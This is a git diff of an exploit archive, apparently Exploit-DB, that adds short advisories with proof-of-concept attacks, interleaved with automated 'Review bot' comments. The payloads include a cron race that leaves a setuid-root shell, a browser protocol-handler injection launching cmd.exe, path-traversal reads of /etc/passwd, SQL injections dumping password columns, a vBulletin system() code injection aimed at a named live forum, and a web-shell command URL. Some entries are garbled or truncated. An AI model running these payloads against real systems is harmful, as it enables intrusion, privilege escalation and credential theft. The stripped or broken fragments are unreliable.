--- /dev/null
+++ b/platforms/linux/local/30280.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/24780/info
+
+GFAX is prone to a vulnerability that lets local attackers execute arbitrary commands with superuser privileges. Successful attacks will result in the complete compromise of affected computers.
+
+GFAX 0.7.6 is vulnerable; other versions may also be affected.
+
+while true; do echo "*/1 * * * * root /bin/cp /bin/sh /tmp && chmod 4755 /tmp/sh" > /tmp/crontab; done
\ No newline at end of file
diff --git a/platforms/linux/remote/30284.vbs b/platforms/linux/remote/30284.vbs
new file mode 100755
index 000000000..ba14effff
--- /dev/null
+++ b/platforms/linux/remote/30284.vbs
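Review bot: The PoC is an unbounded `while true` busy loop with no exit condition, and on success it leaves a setuid-root `/tmp/sh` on the host; a reader needs to be told to run it in the background, stop it once `/tmp/sh` exists (`ls -l /tmp/sh`), and remove the binary afterwards, e.g. `while [ ! -u /tmp/sh ]; do echo "..." > /tmp/crontab; done`. The advisory does not say how `/tmp/crontab` gets picked up by cron — the line uses the six-field system-crontab format with a `root` user column, so presumably a root-privileged gfax component installs it, but that cannot be confirmed from this text. A one-sentence description of the race (what gfax writes to `/tmp/crontab` and when) would make the loop's purpose clear.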
@@ -0,0 +1,139 @@ +source: http://www.securityfocus.com/bid/24832/info + +Sun Java Runtime Environment is prone to a stack-based buffer-overflow vulnerability because it fails to adequately bounds-check user-supplied input before copying it to an insufficiently sized memory buffer. + +An attacker can exploit this issue to execute arbitrary code with the privileges of the user running the affected application. Failed exploit attempts will likely result in a denial-of-service condition. + +This issue affects these versions: + +Java Runtime Environment 6 update 1 +Java Runtime Environment 5 update 11 + +Prior versions are also affected. + +'----------------------------------------------------------------------------------------------- +' Java Web Start Buffer Overflow POC Exploit +' +' FileName: JavaWebStartPOC.VBS +' Contact: ZhenHan.Liu#ph4nt0m.org +' Date: 2007-07-10 +' Team: http://www.ph4nt0m.org +' Enviroment: Tested on JRE 1.6, javaws.exe v6.0.10.6 +' Reference: http://seclists.org/fulldisclosure/2007/Jul/0155.html +' Usage: I did not put a real alpha shellcode here, you'd replace it with your own. 
+' +' Code(javaws.exe): +' .text:00406208 ; *************** S U B R O U T I N E *************************************** +' .text:00406208 +' .text:00406208 ; Attributes: bp-based frame +' .text:00406208 +' .text:00406208 sub_406208 proc near ; CODE XREF: sub_405468+4E p +' .text:00406208 +' .text:00406208 FileName = byte ptr -540h +' .text:00406208 FindFileData = _WIN32_FIND_DATAA ptr -140h +' .text:00406208 arg_0 = dword ptr 8 +' .text:00406208 arg_4 = dword ptr 0Ch +' .text:00406208 +' .text:00406208 push ebp ; FileName 1k Buffer +' .text:00406209 mov ebp, esp +' .text:0040620B sub esp, 540h +' .text:00406211 push 5Fh +' .text:00406213 push 2Fh +' .text:00406215 push [ebp+arg_0] +' .text:00406218 call sub_40544D +' .text:00406218 +' .text:0040621D push 5Fh +' .text:0040621F push 3Ah +' .text:00406221 push [ebp+arg_0] +' .text:00406224 call sub_40544D +' .text:00406224 +' .text:00406229 add esp, 18h +' .text:0040622C push 2Ah +' .text:0040622E push [ebp+arg_0] ; codebase buffer +' .text:00406231 push 5Ch +' .text:00406233 push offset s_Si ; "si" +' .text:00406238 push 5Ch +' .text:0040623A push offset s_Tmp_0 ; "tmp" +' .text:0040623F push 5Ch +' .text:00406241 call sub_40615B +' .text:00406241 +' .text:00406246 push eax +' .text:00406247 lea eax, [ebp+FileName] +' .text:0040624D push offset s_SCSCSCSC ; "%s%c%s%c%s%c%s%c" +' .text:00406252 push eax ; char * +' .text:00406253 call _sprintf ; sprintf copy codebase to 1k stack buffer lead to buffer over flow +' .text:00406253 +' .text:00406258 add esp, 28h +' .text:0040625B lea eax, [ebp+FindFileData] +' .text:00406261 push eax ; lpFindFileData +' .text:00406262 lea eax, [ebp+FileName] +' .text:00406268 push eax ; lpFileName +' .text:00406269 call ds:FindFirstFileA +' .text:0040626F cmp eax, 0FFFFFFFFh +' .text:00406272 jnz short loc_406278 +' .text:00406272 +' .text:00406274 xor eax, eax +' .text:00406276 leave +' .text:00406277 retn +' .text:00406277 +' .text:00406278 ; 
--------------------------------------------------------------------------- +' .text:00406278 +' .text:00406278 loc_406278: ; CODE XREF: sub_406208+6A j +' .text:00406278 push esi +' .text:00406279 mov esi, [ebp+arg_4] +' .text:0040627C lea ecx, [ebp+FindFileData' .cFileName] +' .text:00406282 mov edx, ecx +' .text:00406284 sub esi, edx +' .text:00406284 +' .text:00406286 +' .text:00406286 loc_406286: ; CODE XREF: sub_406208+86 j +' .text:00406286 mov dl, [ecx] +' .text:00406288 mov [esi+ecx], dl +' .text:0040628B inc ecx +' .text:0040628C test dl, dl +' .text:0040628E jnz short loc_406286 +' .text:0040628E +' .text:00406290 push eax ; hFindFile +' .text:00406291 call ds:FindClose +' .text:00406297 xor eax, eax +' .text:00406299 inc eax +' .text:0040629A pop esi +' .text:0040629B leave +' .text:0040629C retn +' .text:0040629C +' .text:0040629C sub_406208 endp +'----------------------------------------------------------------------------------------------- + +If WScript.Arguments.Count <> 1 Then + WScript.Echo WScript.ScriptName & " " + WScript.Quit +End If + +sFileName = WScript.Arguments(0) + +On Error Resume Next + +Set oFSO = WScript.CreateObject("Scripting.FileSystemObject") +Set oFS = oFSO.CreateTextFile(sFileName) + +If Err.Number <> 0 Then + WScript.Echo "Error: Failed Create File." + WScript.Quit +End If + +c = Chr(&H04) +alphaShellcode = "IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII" + +oFS.WriteLine "" +oFS.WriteLine "" +oFS.WriteLine "" + +If Err.Number <> 0 Then + WScript.Echo "Error: Failed Write File." + Err.Clear +End If + +oFS.Close + +Set oFS = Nothing +Set oFSO = Nothing diff --git a/platforms/linux/remote/30285.txt b/platforms/linux/remote/30285.txt new file mode 100755 index 000000000..bada251fb --- /dev/null +++ b/platforms/linux/remote/30285.txt 
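Review bot: The three `oFS.WriteLine ""` calls emit empty strings, and `c = Chr(&H04)` and `alphaShellcode` are assigned but never referenced, so the JNLP content carrying the overlong `codebase` attribute has been lost — most likely stripped as HTML tags when the script was archived; as published it just creates an empty file. The usage line `WScript.Echo WScript.ScriptName & " "` looks truncated for the same reason (no argument placeholder after the name). Per the disassembly comments, `FileName` sits at `ebp-540h` and `FindFileData` at `ebp-140h`, so the `%s%c%s%c%s%c%s%c` `sprintf` has 0x400 bytes before the `codebase` overruns into the `WIN32_FIND_DATAA` structure and then the saved frame — a reader rebuilding the `<jnlp codebase="...">` line from the reference URL needs that size, and it would be worth stating in the header. The file is also filed under `platforms/linux/remote/` although it targets `javaws.exe` on Windows.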
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/24837/info
+
+Microsoft Internet Explorer, Mozilla Firefox and Netscape Navigator are prone to a vulnerability that lets attackers inject commands through the 'firefoxurl' and 'navigatorurl' protocol handlers.
+
+Exploiting these issues allows remote attackers to pass and execute arbitrary commands and arguments through the 'firefox.exe' and 'navigator.exe' processes by employing the 'firefoxurl' and 'navigatorurl' handlers.
+
+An attacker can also employ these issues to carry out cross-browser scripting attacks by using the '-chrome' argument. This can allow the attacker to run JavaScript code with the privileges of trusted Chrome context and gain full access to Firefox and Netscape Navigator's resources.
+
+Exploiting these issues would permit remote attackers to influence command options that can be called through the 'firefoxurl' and 'navigatorurl' handlers and therefore execute commands and script code with the privileges of a user running the applications. Successful attacks may result in a variety of consequences, including remote unauthorized access.
+
+navigatorurl:test"%20-chrome%20"javascript:C=Components.classes;I=Components.interfaces;file=C['@mozilla.org/file/local;1'].createInstance(I.nsILocalFile);file.initWithPath('C:'+String.fromCharCode(92)+String.fromCharCode(92)+'Windows'+String.fromCharCode(92)+String.fromCharCode(92)+'System32'+String.fromCharCode(92)+String.fromCharCode(92)+'cmd.exe');process=C['@mozilla.org/process/util;1'].createInstance(I.nsIProcess);process.init(file);process.run(true%252c{}%252c0);alert(process)
\ No newline at end of file
diff --git a/platforms/linux/remote/30286.txt b/platforms/linux/remote/30286.txt
new file mode 100755
index 000000000..dd7c6c2aa
--- /dev/null
+++ b/platforms/linux/remote/30286.txt
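Review bot: This advisory is committed as platforms/linux/remote/30285.txt, but the issue it documents is the firefoxurl/navigatorurl protocol-handler argument injection on Windows, and the PoC on the last line of the hunk assembles the path `C:\Windows\System32\cmd.exe` from String.fromCharCode(92) separators, so the platform directory should be `windows` rather than `linux`. The files.csv row for 30285 is outside this chunk and presumably carries the same platform value, so it would need the same correction. The description's point about the `-chrome` argument is the one defenders should keep: the escalation from argument injection to script in the trusted chrome context comes from the handler passing its argument list through unescaped, not from the URL scheme itself.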
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/24853/info
+
+ImgSvr is prone to a local file-include vulnerability because it fails to sanitize user-supplied input.
+
+Attackers may exploit this issue to access files that may contain sensitive information.
+
+UPDATE (December 24, 2007): According to the vendor, this issue was addressed in ImgSvr 0.6.21. However, reports indicate that this version is still vulnerable.
+
+GET /?template=../../../../../../../../../../etc/passwd HTTP/1.0
\ No newline at end of file
diff --git a/platforms/multiple/remote/30218.txt b/platforms/multiple/remote/30218.txt
new file mode 100755
index 000000000..55a1c79fd
--- /dev/null
+++ b/platforms/multiple/remote/30218.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/24566/info
+
+BugHunter HTTP Server is prone to an information-disclosure vulnerability.
+
+An attacker can exploit this issue to gain access to sensitive information. Information obtained may lead to further attacks.
+
+This issue affects HTTP Server 1.6.2; other versions may also be affected.
+
+http://www.example.com/test.htm%20
\ No newline at end of file
diff --git a/platforms/multiple/remote/30219.txt b/platforms/multiple/remote/30219.txt
new file mode 100755
index 000000000..1eb23f9b5
--- /dev/null
+++ b/platforms/multiple/remote/30219.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/24571/info
+
+MyServer is prone to an information-disclosure vulnerability.
+
+An attacker can exploit this issue to access sensitive information that may lead to further attacks.
+
+This issue affects MyServer 0.8.9; other versions may also be affected.
+
+http://www.example.com/cgi-bin/post.mscgI (Note: Capital 'I' at the end of the URI)
\ No newline at end of file
diff --git a/platforms/multiple/remote/30222.txt b/platforms/multiple/remote/30222.txt
new file mode 100755
index 000000000..c3d4751e7
--- /dev/null
+++ b/platforms/multiple/remote/30222.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/24583/info
+
+MyServer is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+MyServer 0.8.9 is vulnerable; other versions may also be affected.
+
+http://localhost/cgi-bin/post.mscgi Post:
\ No newline at end of file
diff --git a/platforms/multiple/remote/30229.txt b/platforms/multiple/remote/30229.txt
new file mode 100755
index 000000000..e34848642
--- /dev/null
+++ b/platforms/multiple/remote/30229.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/24618/info
+
+SHTTPD is prone to an information-disclosure vulnerability.
+
+An attacker can exploit this issue to access sensitive information that may lead to further attacks.
+
+This issue affects SHTTPD 1.38; other versions may also be affected.
+
+http://www.example.com/test.php%20
\ No newline at end of file
diff --git a/platforms/multiple/remote/30231.txt b/platforms/multiple/remote/30231.txt
new file mode 100755
index 000000000..0f37d7835
--- /dev/null
+++ b/platforms/multiple/remote/30231.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/24623/info
+
+Key Focus Web Server is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+This issue affects Key Focus Web Server 3.1.0; other versions may also be affected.
+
+http://www.example.com:9727/index.wkf?opmenu=0&opsubmenu=aaaa%22%3E%3Cscript%3Ealert('xss');%3C/script%3E
\ No newline at end of file
diff --git a/platforms/multiple/remote/30256.txt b/platforms/multiple/remote/30256.txt
new file mode 100755
index 000000000..4bc616379
--- /dev/null
+++ b/platforms/multiple/remote/30256.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/24697/info
+
+Oracle Rapid Install Web Server is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to inject HTML and script code into the browser of an unsuspecting victim. The attacker may then steal cookie-based authentication credentials and launch other attacks.
+
+http://www.example.com:8004/pls/MSBEP004/
+
+http://www.example.com:8004/pls/
\ No newline at end of file
diff --git a/platforms/multiple/remote/30264.txt b/platforms/multiple/remote/30264.txt
new file mode 100755
index 000000000..a43d282ed
--- /dev/null
+++ b/platforms/multiple/remote/30264.txt
@@ -0,0 +1,33 @@
+source: http://www.securityfocus.com/bid/24762/info
+
+Fujitsu ServerView is prone to a remote command-execution vulnerability because it fails to adequately sanitize user-supplied data.
+
+Attackers can exploit this issue to execute arbitrary commands with the privileges of the affected application. Successful attacks will compromise the application and underlying webserver; other attacks are also possible.
+
+Versions prior to Fujitsu ServerView 4.50.09 are vulnerable.
+
+http://www.example.com/cgi-bin/ServerView/
+SnmpView/DBAsciiAccess
+?SSL=
+&Application=ServerView/SnmpView
+&Submit=Submit
+&UserID=1
+&Profile=
+&DBAccess=ASCII
+&Viewing=-1
+&Action=Show
+&ThisApplication=TestConnectivityFrame
+&DBElement=ServerName
+&DBValue=bcmes
+&DBList=snism
+&UserValue=
+&DBTableList=SERVER_LIST
+&Sorting=
+&ParameterList=What--primary,,
+OtherCommunity--public,,
+SecondIP--,,
+Timeout--5,,
+Community--public,,
+ServerName--bcmes,,
+Servername--127.0.0.1;id;,, # vulnerable parameter
+SType--Server
\ No newline at end of file
diff --git a/platforms/multiple/remote/30265.txt b/platforms/multiple/remote/30265.txt
new file mode 100755
index 000000000..843cb12fb
--- /dev/null
+++ b/platforms/multiple/remote/30265.txt
@@ -0,0 +1,14 @@
+source: http://www.securityfocus.com/bid/24765/info
+
+SAP Message Server is prone to a remote heap-based buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data before copying it to an insufficiently sized buffer.
+
+Remote attackers can exploit this issue to execute arbitrary code with SYSTEM-level privileges. Successful attacks will result in a complete compromise of affected computers. Failed attacks will likely result in denial-of-service conditions that disable all functionality of the application.
+
+GET /msgserver/html/group?group=**498 bytes** HTTP/1.0
+Accept: */*
+Accept-Language: en-us
+Pragma: no-cache
+User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET
+CLR 1.1.4322; .NET CLR 2.0.50727)
+Host: sapserver:8100
+Proxy-Connection: Keep-Alive
\ No newline at end of file
diff --git a/platforms/multiple/remote/30279.txt b/platforms/multiple/remote/30279.txt
new file mode 100755
index 000000000..42d26c9b2
--- /dev/null
+++ b/platforms/multiple/remote/30279.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/24775/info
+
+SAP Internet Graphics Server is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker may perform cross-site scripting attacks on unsuspecting users in the context of the affected website. As a result, the attacker may be able to steal cookie-based authentication credentials and to launch other attacks.
+
+http://www.example.com/ADM:GETLOGFILE?PARAMS=
\ No newline at end of file
diff --git a/platforms/multiple/remote/30288.txt b/platforms/multiple/remote/30288.txt
new file mode 100755
index 000000000..1e3f613ff
--- /dev/null
+++ b/platforms/multiple/remote/30288.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/24856/info
+
+Adobe Flash Player is prone to a remote code-execution vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this issue by tricking an unsuspecting victim into opening a malicious file.
+
+A successful exploit will result in the execution of arbitrary attacker-supplied code in the context of the victim running the vulnerable application.
+
+Adobe Flash Player 9.0.45.0 and earlier, 8.0.34.0 and earlier, and 7.0.69.0 and earlier are affected.
+
+http://www.exploit-db.com/sploits/30288.zip
diff --git a/platforms/osx/remote/30228.txt b/platforms/osx/remote/30228.txt
new file mode 100755
index 000000000..fdb7685b0
--- /dev/null
+++ b/platforms/osx/remote/30228.txt
@@ -0,0 +1,17 @@
+source: http://www.securityfocus.com/bid/24598/info
+
+Apple WebCore is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker may exploit this issue by enticing victims into visiting a malicious website.
+
+The attacker may leverage this issue to execute arbitrary script code in an application using the affected framework (typically Safari). This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+xmlhttp.setRequestHeader('Foo', 'baa\nHost: test\n');
+
+The above request is treated as valid and results in:
+
+GET / HTTP/1.1
+Accept-Encoding: gzip, deflate
+Accept-Language: en
+Foo: baa
+Host: test
\ No newline at end of file
diff --git a/platforms/php/webapps/30180.txt b/platforms/php/webapps/30180.txt
index 2cac12052..eb184e1b7 100755
--- a/platforms/php/webapps/30180.txt
+++ b/platforms/php/webapps/30180.txt
@@ -1,10 +1,31 @@ # Exploit Title:vBulletin 5.?.x Remote Code Execution -# Date: 09/12/13 +# Date: 11/12/13 # Exploit Author: @sergioyoshiman (Sergio Yoshikata) # Vendor Homepage:https://www.*vbulletin*.com/ # Versions affected : 2012 -Injector team was selling this exploit for 700 $ a complete shit and -only 10 % are vulnerable. -The exploit -search.php?ajax=0&beforeafter=after&childforums=1&exactname=1&exclude=&forumchoice=&nocache=0&query=%24%7b%40system('pwd')%7d&quicksearch=0&replyless=0&replylimit=0&saveprefs=1&searchdate=0&searchthreadid=0&searchtype=1&searchuser=1&showposts=0&sortby=rank&sortorder=descending&starteronly=0&tag=17&t itleonly=0&userid=0 +Injector team was selling this exploit for 700 $ a complete shit and only +10 % are vulnerable. +Simple to find. +The poc +search.php?ajax=0&beforeafter=after&childforums=1& +exactname=1&exclude=&forumchoice=&nocache=0&query= +%24%7b%40system('pwd')%7d&quicksearch=0&replyless= +0&replylimit=0&saveprefs=1&searchdate=0&searchthre +adid=0&searchtype=1&searchuser=1&showposts=0&sortb +y=rank&sortorder=descending&starteronly=0&tag=17&t itleonly=0&userid=0 + +The vulnerable $_GET parameter is query. +You should need to create a user and use it like this + +php code to inject : ${@system('put command here')} + +Example: +Tested on : forums.5series.net/search.php?ajax=0&beforeafter=after&childforums=1& +exactname=1&exclude=&forumchoice=&nocache=0&query= +%24%7b%40system('pwd')%7d&quicksearch=0&replyless= +0&replylimit=0&saveprefs=1&searchdate=0&searchthre +adid=0&searchtype=1&searchuser=1&showposts=0&sortb +y=rank&sortorder=descending&starteronly=0&tag=17&t itleonly=0&userid=0 + +Greetz ,Ohh a 16 year old guys pwned 1337day ? diff --git a/platforms/php/webapps/30214.txt b/platforms/php/webapps/30214.txt deleted file mode 100755 index b20b2c3b1..000000000 --- a/platforms/php/webapps/30214.txt +++ /dev/null 
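Review bot: The added `Tested on :` line aims the PoC at a third-party production host (forums.5series.net) instead of a placeholder, which the other advisories in this commit avoid by writing www.example.com, 127.0.0.1 or [path]; a published PoC should not name an uninvolved live site, so the host belongs replaced with something like `http://[target]/search.php?...`. The same applies to the two `Demo:` URLs in 30239.txt further down this diff (www.mdjustlisted.com and www.stunicom.com). The `# Date:` edit from 09/12/13 to 11/12/13 keeps an ambiguous day/month order; an ISO date would make the header unambiguous for the index.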
@@ -1,31 +0,0 @@ -############################################################### -# Exploit Title: Wordpress Skinizer theme Remote File Upload Vulnerability -# Author: Ashiyane Digital Security Team -# Date: 12/11/2013 -# Vendor Homepage: http://themeforest.net -# Software Link: http://prefiles.com/9dgxv5102nkp/Skinizer.WordPress.v1.0.4.rar -# Google dork: Use your brain :) -# Tested on: Windows/Linux -############################################################### - -1) Exploit : -= = = = = = - -"@$uploadfile")); curl_setopt($ch, -CURLOPT_RETURNTRANSFER, 1); -$postResult = curl_exec($ch); -curl_close($ch); print "$postResult"; -?> -# http://[Target]/wp-content/uploads/2013/12/file.php - -# #### #### #### #### #### #### #### #### # -# BY T3rm!nat0r5 -# E-mail : poya.terminator@gmail.com -# #### #### #### #### #### #### #### #### # diff --git a/platforms/php/webapps/30217.txt b/platforms/php/webapps/30217.txt new file mode 100755 index 000000000..5ccd70884 --- /dev/null +++ b/platforms/php/webapps/30217.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/24565/info + +Wrapper.php for OsCommerce is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. + +Exploiting this issue may allow an unauthorized user to view files and execute local scripts. + +http://www.example.com/wrapper.php?file=../../../../etc/passwd \ No newline at end of file diff --git a/platforms/php/webapps/30220.txt b/platforms/php/webapps/30220.txt new file mode 100755 index 000000000..d38390e47 --- /dev/null +++ b/platforms/php/webapps/30220.txt 
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/24572/info
+
+PHP Accounts is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+Exploiting this issue may allow an unauthorized user to view files and execute local scripts.
+
+PHP Accounts 0.5 is vulnerable; other versions may also be affected.
+
+http://www.example.com/index.php?page=../../etc/passwd
\ No newline at end of file
diff --git a/platforms/php/webapps/30221.txt b/platforms/php/webapps/30221.txt
new file mode 100755
index 000000000..12a8e677b
--- /dev/null
+++ b/platforms/php/webapps/30221.txt
@@ -0,0 +1,14 @@
+source: http://www.securityfocus.com/bid/24574/info
+
+PHP Accounts is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+PHP Accounts 0.5 is vulnerable; other versions may also be affected.
+
+http://www.example.com/path/index.php?Outgoing_Type_ID=[SQL INJECTION]
+http://www.example.com/path/index.php?Outgoing_ID=[SQL INJECTION]
+http://www.example.com/path/index.php?Project_ID=[SQL INJECTION]
+http://www.example.com/path/index.php?Client_ID=[SQL INJECTION]
+http://www.example.com/path/index.php?Invoice_ID=[SQL INJECTION]
+http://www.example.com/path/index.php?Vendor_ID=[SQL INJECTION]
\ No newline at end of file
diff --git a/platforms/php/webapps/30223.txt b/platforms/php/webapps/30223.txt
new file mode 100755
index 000000000..e11d1045d
--- /dev/null
+++ b/platforms/php/webapps/30223.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/24584/info
+
+NetClassifieds is prone to multiple input-validation vulnerabilities because the application fails to sanitize user-supplied input. These vulnerabilities include multiple SQL-injection issues and cross-site scripting issues.
+
+A successful exploit may allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+NetClassifieds Free, Standard, Professional, and Premium editions are reported vulnerable.
+
+http://www.example.com/ViewCat.php?CatID=-8+union+select+1,email,3+from+users/*
+http://www.example.com/ViewCat.php?s_user_id='+union+select+user_password+from+users+where%20user_id=1/*
\ No newline at end of file
diff --git a/platforms/php/webapps/30225.txt b/platforms/php/webapps/30225.txt
new file mode 100755
index 000000000..d6974b5a5
--- /dev/null
+++ b/platforms/php/webapps/30225.txt
@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/24590/info
+
+eNdonesia is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify sensitive data, or exploit latent vulnerabilities in the underlying database.
+
+eNdonesia 8.4 is vulnerable; other versions may also be affected.
+
+http://www.example.com/mod.php?mod=katalog&op=viewlink&cid=-1+union+select+1,pwd,3+from+authors/*
+http://www.example.com/mod.php?mod=katalog&op=viewlink&cid=-1+union+select+1,LOAD_FILE(0x2F6574632F706173737764),3+from+authors/*
+http://www.example.com/mod.php?mod=diskusi&op=viewdisk&did=-9+union+select+1,2,aid,pwd,5,6,email+from+authors/*
+http://www.example.com/mod.php?mod=publisher&op=viewarticle&cid=2&artid=-9+union+select+1,2,3,4,5,pwd,aid,email,9,0+from+authors/*
+http://www.example.com/mod.php?mod=publisher&op=printarticle&artid=-47+union+select+1,concat_ws%280x3a,aid,name,pwd%29,3,4,5,6,7+from+authors--
+
+
diff --git a/platforms/php/webapps/30226.txt b/platforms/php/webapps/30226.txt
new file mode 100755
index 000000000..46faa8c81
--- /dev/null
+++ b/platforms/php/webapps/30226.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/24590/info
+
+eNdonesia is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify sensitive data, or exploit latent vulnerabilities in the underlying database.
+
+eNdonesia 8.4 is vulnerable; other versions may also be affected.
+
+http://www.example.com/banners.php?op=click&bid=-9+union+select+pwd+from+authors/*
\ No newline at end of file
diff --git a/platforms/php/webapps/30227.txt b/platforms/php/webapps/30227.txt
new file mode 100755
index 000000000..32d5f71c8
--- /dev/null
+++ b/platforms/php/webapps/30227.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/24591/info
+
+The 'mod_forum' component for Joomla and Mambo is prone to a remote file-include vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker can exploit this issue to include arbitrary remote files containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and to access the underlying system.
+
+http://www.example.com/components/com_forum/download.php?phpbb_root_path=[Shell]
\ No newline at end of file
diff --git a/platforms/php/webapps/30230.txt b/platforms/php/webapps/30230.txt
new file mode 100755
index 000000000..402f02e75
--- /dev/null
+++ b/platforms/php/webapps/30230.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/24621/info
+
+MyNews is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+
+A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
+
+This issue affects MyNews 0.10; other versions may also be vulnerable.
+
+To exploit this issue, modify the following cookie variable: authacc = "' OR `row_id`=1 UNION SELECT * FROM `sessions` WHERE '1%3A1%3A1%3A1%3AAdmin"
\ No newline at end of file
diff --git a/platforms/php/webapps/30232.txt b/platforms/php/webapps/30232.txt
new file mode 100755
index 000000000..740707604
--- /dev/null
+++ b/platforms/php/webapps/30232.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/24626/info
+
+Calendrix is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Calendrix 0.7 is vulnerable; other versions may also be affected.
+
+http://www.example.com/[PRODUCT-DIRECTORY]/calendar.php?year= http://www.example.com/[PRODUCT-DIRECTORY]/calendar.php?month="> http://www.example.com/[PRODUCT-DIRECTORY]/yearcal.php?ycyear= http://www.example.com/[PRODUCT-DIRECTORY]/cal_footer.inc.php?leftfooter=
\ No newline at end of file
diff --git a/platforms/php/webapps/30234.txt b/platforms/php/webapps/30234.txt
new file mode 100755
index 000000000..0ce233506
--- /dev/null
+++ b/platforms/php/webapps/30234.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/24633/info
+
+Calendarix is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+These issues affect Calendarix 0.7.20070307; other versions may also be affected.
+
+http://www.example.com/calendar.php?month=' UNION SELECT 1, 1, `password`, `username` ,1 FROM `calendar_users` %23
+
+http://www.example.com/calendar.php?month=&year=' UNION SELECT 1, 1, `password`, `username` ,1 FROM `calendar_users` %23
\ No newline at end of file
diff --git a/platforms/php/webapps/30235.txt b/platforms/php/webapps/30235.txt
new file mode 100755
index 000000000..1cef387f9
--- /dev/null
+++ b/platforms/php/webapps/30235.txt
@@ -0,0 +1,31 @@
+# KikChat <= (LFI/RCE) Multiple Vulnerability
+# By cr4wl3r http://bastardlabs.info
+# Script : http://petitvincent.perso.free.fr/Webmastering/Script%20PHP%20HTML%20JAVASCRIPT/php%20scripts/kikchat.zip
+# Tested : Windows / Linux
+# Dork : download script
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Vulnable LFI [ private.php ]
+
+http://127.0.0.1/KikChat/private.php?name=../../../../../../../../../../[file]
+http://127.0.0.1/KikChat/private.php?name=../../../../../../../../../../boot.ini
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Vulnable RCE [ /rooms/get.php ]:
+
+http://127.0.0.1/KikChat/rooms/get.php?name=shell.php&ROOM=
+http://127.0.0.1/KikChat/myroom/shell.php?cmd=whoami;id;uname -a;pwd;ls -al
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+makase banyak :
+
+tau lo bentor to hulandalo
+tamongodula'a wau tamohutata, dulo ito momongulipu
+
+
+\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
+p.s
+malandingalo wa'u sebenarnya mohutu sploitz
+bo sekedar koleksi saja :D
+\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
+
+
+// gorontalo 2013
diff --git a/platforms/php/webapps/30238.txt b/platforms/php/webapps/30238.txt
new file mode 100755
index 000000000..1842b345e
--- /dev/null
+++ b/platforms/php/webapps/30238.txt
